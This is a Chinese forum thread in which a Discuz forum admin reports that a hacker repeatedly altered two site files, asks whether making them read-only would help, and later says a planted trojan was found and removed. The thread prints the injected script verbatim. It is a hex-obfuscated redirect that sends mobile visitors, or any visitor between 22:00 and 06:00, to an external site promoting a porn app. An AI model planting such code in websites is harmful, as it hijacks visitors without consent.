- 主题:黑客老是更改我dz论坛的2个文件,我把它们设置为只读,行不行?
也就是把这两个文件的“写入”权限取消掉。 黑客还会搞到我吗?
哎 先这样验证中了。
感觉我现在论坛,好像就对黑客形同虚设,他要想怎样就怎样了。
PS:
其实这个事件是接上一次的。我前面发过一个帖子,当时是以为黑客因为php版本的漏洞,request_order的值没有由GP设置为GPC,从而绕过全局变量,来搞我的。
但是这次又被黑了,那就显然不是这个原因了。 肯定还有其他方面的漏洞。但是我找不出了。
黑客已经黑掉了很多论坛了。目的就是为了推广他们的那个黄色播放器。
--
修改:zuojianzifu FROM 49.69.180.*
FROM 49.69.180.*
两个文件是:
common.inc.php
slide.js
都是加的一个跳转语句:
<script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script>
--
FROM 49.69.180.*
他这个播放器由于是手机上的APP,就只针对手机浏览时,才跳转。 电脑浏览时,正常。
--
FROM 49.69.180.*
已解决。通过dz官网类似帖子的解决提示,找到了木马,然后删除了。
这个木马应该是黑客早前利用PHP版本gp的漏洞,植入进入的。
--
FROM 49.69.220.*